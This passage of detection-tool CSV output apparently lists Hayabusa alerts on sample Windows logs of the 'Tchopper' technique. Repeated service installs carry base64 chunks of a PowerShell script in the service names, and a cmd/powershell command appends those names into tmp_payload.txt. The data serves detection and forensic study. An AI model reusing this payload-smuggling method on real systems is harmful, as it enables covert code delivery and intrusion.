0KICAgICAgICAkRHJvcERvd25MYWJlbC5UZXh0ID0gIk9wdGlvbnM6Ig0KICAgICAgICAkRm9ybS5Db250cm9scy5BZGQoJERyb3BEb3duTGFiZWwpDQoNCiAgICAgICAgJEJ1dHRvbiA9IG5ldy1v | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg200"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:05.916 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: YmplY3QgU3lzdGVtLldpbmRvd3MuRm9ybXMuQnV0dG9uDQogICAgICAgICRCdXR0b24uTG9jYXRpb24gPSBuZXctb2JqZWN0IFN5c3RlbS5EcmF3aW5nLlNpemUoMTAwLDUwKQ0KICAgICAgICAkQn | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg201"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:05.916 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: YmplY3QgU3lzdGVtLldpbmRvd3MuRm9ybXMuQnV0dG9uDQogICAgICAgICRCdXR0b24uTG9jYXRpb24gPSBuZXctb2JqZWN0IFN5c3RlbS5EcmF3aW5nLlNpemUoMTAwLDUwKQ0KICAgICAgICAkQn | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg201"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:05.916 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: YmplY3QgU3lzdGVtLldpbmRvd3MuRm9ybXMuQnV0dG9uDQogICAgICAgICRCdXR0b24uTG9jYXRpb24gPSBuZXctb2JqZWN0IFN5c3RlbS5EcmF3aW5nLlNpemUoMTAwLDUwKQ0KICAgICAgICAkQn | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg201"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:07.360 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: V0dG9uLlNpemUgPSBuZXctb2JqZWN0IFN5c3RlbS5EcmF3aW5nLlNpemUoMTAwLDIwKQ0KICAgICAgICAkQnV0dG9uLlRleHQgPSAiU3VibWl0Ig0KICAgICAgICAkQnV0dG9uLkFkZF9DbGljayh7 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg202"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:07.360 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: V0dG9uLlNpemUgPSBuZXctb2JqZWN0IFN5c3RlbS5EcmF3aW5nLlNpemUoMTAwLDIwKQ0KICAgICAgICAkQnV0dG9uLlRleHQgPSAiU3VibWl0Ig0KICAgICAgICAkQnV0dG9uLkFkZF9DbGljayh7 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg202"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:07.360 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: V0dG9uLlNpemUgPSBuZXctb2JqZWN0IFN5c3RlbS5EcmF3aW5nLlNpemUoMTAwLDIwKQ0KICAgICAgICAkQnV0dG9uLlRleHQgPSAiU3VibWl0Ig0KICAgICAgICAkQnV0dG9uLkFkZF9DbGljayh7 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg202"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:08.810 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: UmV0dXJuLURyb3BEb3dufSkNCiAgICAgICAgJGZvcm0uQ29udHJvbHMuQWRkKCRCdXR0b24pDQoNCiAgICAgICAgJERyb3BEb3duLlNlbGVjdGVkSW5kZXggPSAgMA0KICAgICAgICANCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg203"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:08.810 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: UmV0dXJuLURyb3BEb3dufSkNCiAgICAgICAgJGZvcm0uQ29udHJvbHMuQWRkKCRCdXR0b24pDQoNCiAgICAgICAgJERyb3BEb3duLlNlbGVjdGVkSW5kZXggPSAgMA0KICAgICAgICANCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg203"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:08.810 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: UmV0dXJuLURyb3BEb3dufSkNCiAgICAgICAgJGZvcm0uQ29udHJvbHMuQWRkKCRCdXR0b24pDQoNCiAgICAgICAgJERyb3BEb3duLlNlbGVjdGVkSW5kZXggPSAgMA0KICAgICAgICANCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg203"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:10.268 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgJEZvcm0uQWRkX1Nob3duKHskRm9ybS5BY3RpdmF0ZSgpfSkNCiAgICAgICAgW3ZvaWRdICRGb3JtLlNob3dEaWFsb2coKQ0KDQogICAgICAgICRDaG9pY2UNCiAgICAgfQ0KICAgICANCiAgICBj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg204"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:10.268 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgJEZvcm0uQWRkX1Nob3duKHskRm9ybS5BY3RpdmF0ZSgpfSkNCiAgICAgICAgW3ZvaWRdICRGb3JtLlNob3dEaWFsb2coKQ0KDQogICAgICAgICRDaG9pY2UNCiAgICAgfQ0KICAgICANCiAgICBj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg204"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:10.268 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgJEZvcm0uQWRkX1Nob3duKHskRm9ybS5BY3RpdmF0ZSgpfSkNCiAgICAgICAgW3ZvaWRdICRGb3JtLlNob3dEaWFsb2coKQ0KDQogICAgICAgICRDaG9pY2UNCiAgICAgfQ0KICAgICANCiAgICBj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg204"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:11.713 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: YXRjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBnZW5lcmF0ZSBpbnB1dCBkcm9wIGRvd24iDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgJEVycm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg205"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:11.713 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: YXRjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBnZW5lcmF0ZSBpbnB1dCBkcm9wIGRvd24iDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgJEVycm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg205"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:11.713 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: YXRjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBnZW5lcmF0ZSBpbnB1dCBkcm9wIGRvd24iDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgJEVycm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg205"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:13.158 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIkNh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg206"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:13.158 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIkNh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg206"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:13.158 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIkNh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg206"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:14.614 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBleGl0DQoNCiAgICB9DQp9DQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg207"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:14.614 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: dWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBleGl0DQoNCiAgICB9DQp9DQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg207"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:14.614 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBleGl0DQoNCiAgICB9DQp9DQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg207"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:16.115 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGdldCB0aGUgbGlzdCBvZiBjb21wdXRlcnMgYmFzZWQgb24gdGhlIHVzZXJzIHNl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg208"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:16.115 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGdldCB0aGUgbGlzdCBvZiBjb21wdXRlcnMgYmFzZWQgb24gdGhlIHVzZXJzIHNl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg208"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:16.115 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGdldCB0aGUgbGlzdCBvZiBjb21wdXRlcnMgYmFzZWQgb24gdGhlIHVzZXJzIHNl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg208"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:17.556 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bGVjdGVkIGxpc3QgdHlwZQ0KDQojQHBhcmFtICRDb21wdXRlckxpc3RUeXBlICAgLT4gVGhlIHR5cGUgb2YgY29tcHV0ZXIgbGlzdCAgIA0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg209"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:17.556 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: bGVjdGVkIGxpc3QgdHlwZQ0KDQojQHBhcmFtICRDb21wdXRlckxpc3RUeXBlICAgLT4gVGhlIHR5cGUgb2YgY29tcHV0ZXIgbGlzdCAgIA0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg209"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:17.556 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bGVjdGVkIGxpc3QgdHlwZQ0KDQojQHBhcmFtICRDb21wdXRlckxpc3RUeXBlICAgLT4gVGhlIHR5cGUgb2YgY29tcHV0ZXIgbGlzdCAgIA0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg209"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:19.033 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBHZXQtQ29tcHV0ZXJMaXN0IHsgcGFyYW0oJENvbXB1dGVyTGlzdFR5 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg210"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:19.033 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBHZXQtQ29tcHV0ZXJMaXN0IHsgcGFyYW0oJENvbXB1dGVyTGlzdFR5 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg210"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:19.033 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBHZXQtQ29tcHV0ZXJMaXN0IHsgcGFyYW0oJENvbXB1dGVyTGlzdFR5 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg210"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:20.486 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cGUpDQoNCg0KICAgIHRyeSB7DQoNCiAgICAgICAgJENvbXB1dGVyTGlzdCA9IEB7fTsNCg0KICAgICAgICBzd2l0Y2goJENvbXB1dGVyTGlzdFR5cGUpIHsNCg0KICAgICAgICAgICAgJERPTUFJTl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg211"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:20.486 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: cGUpDQoNCg0KICAgIHRyeSB7DQoNCiAgICAgICAgJENvbXB1dGVyTGlzdCA9IEB7fTsNCg0KICAgICAgICBzd2l0Y2goJENvbXB1dGVyTGlzdFR5cGUpIHsNCg0KICAgICAgICAgICAgJERPTUFJTl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg211"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:20.486 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cGUpDQoNCg0KICAgIHRyeSB7DQoNCiAgICAgICAgJENvbXB1dGVyTGlzdCA9IEB7fTsNCg0KICAgICAgICBzd2l0Y2goJENvbXB1dGVyTGlzdFR5cGUpIHsNCg0KICAgICAgICAgICAgJERPTUFJTl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg211"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:22.080 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 9PUFQgew0KICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgJEdldEFEQ29tcHV0ZXJMaXN0ID0gR2V0LUFEQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1GaWx0ZXIge2VuYWJs | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg212"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:22.080 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 9PUFQgew0KICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgJEdldEFEQ29tcHV0ZXJMaXN0ID0gR2V0LUFEQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1GaWx0ZXIge2VuYWJs | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg212"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:22.080 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 9PUFQgew0KICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgJEdldEFEQ29tcHV0ZXJMaXN0ID0gR2V0LUFEQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1GaWx0ZXIge2VuYWJs | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg212"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:23.533 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 